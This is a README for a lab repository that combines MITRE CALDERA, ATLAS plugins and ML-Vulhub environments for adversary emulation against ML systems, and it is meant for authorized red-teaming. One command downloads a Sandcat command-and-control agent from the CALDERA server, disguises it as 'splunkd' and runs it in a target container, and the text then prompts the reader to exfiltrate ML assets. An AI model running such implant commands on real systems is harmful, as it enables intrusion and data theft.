This repository brings together several projects to enable adversary emulation and red-teaming of machine learning (ML) systems. It configures the MITRE CALDERA™ docker image with MITRE ATLAS™ plugins and provides sample ML services and environments for testing.
If you want to jump right in and get hands on, run the quick start demo script.
CALDERA is a cyber security platform designed to easily automate adversary emulation, assist manual red-teams, and automate incident response.
MITRE ATLAS (The Adversarial Threat Landscape for AI Systems) is a knowledge base of adversary tactics, techniques, and procedures targeting ML systems.
Included ATLAS CALDERA Plugins:
ML-Vulhub is a collection of of scripts for intantiating ML-related services and modeling ML environments
Clone the repo:
git clone --recursive git@github.com:mitre-atlas/caldera-atlas.git
cd caldera-atlas
Build the CALDERA docker image:
docker-compose build
Run the CALDERA docker image with ATLAS plugins plugins (almanac
and arsenal
):
docker-compose up -d
Access the CALDERA interface at localhost.
The default username/password is admin
/admin
If you aren't already familiar with CALDERA, start with the CALDERA documentation.
The Almanac and Arsenal plugins can be accessed under the Plugins heading on the left-hand navigation menu.
Arsenal populates CALDERA with new Abilities that implement ATLAS techniques. It also adds new Adversary Profiles that use ATLAS techniques target ML services and resources. More information is available in the Arsenal documentation.
docker-compose down
ML-Vulhub is a companion project that provides sample ML-enabled services and environments. This example models a compromised ML developer machine that has access to a private s3 bucket containing a model zoo and an internal ML model served with torchserve.
Startup CALDERA if it's not already running.
docker-compose up -d
Start a test environment from an example on ML VulHub.
cd ml-vulhub/envs/example-00-ml-dev
docker-compose build ./init.sh
docker-compose up -d
3. Launch a Sandcat agent on the mldev container:
```bash
docker-compose exec mldev bash -c 'server=http://host.docker.internal:8888; curl -s -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download -o splunkd; chmod u+x splunkd; ./splunkd -server $server -group red -v'
What ML assets can you discover and exfiltrate? What ML services can you discover, target, and attack?
docker-compose down
from both the caldera-atlas
and ml-vulhub/envs/example-00-ml-dev
directories.The provided demo.sh
script is a "one-click" script to setup CALDERA with ATLAS plugins and a sample target environment for adversary emulation and red-teaming.
This will:
caldera
app and start the server in a tmux
sessionarsenal
, almanac
ml-vulhub
Run:
./demo.sh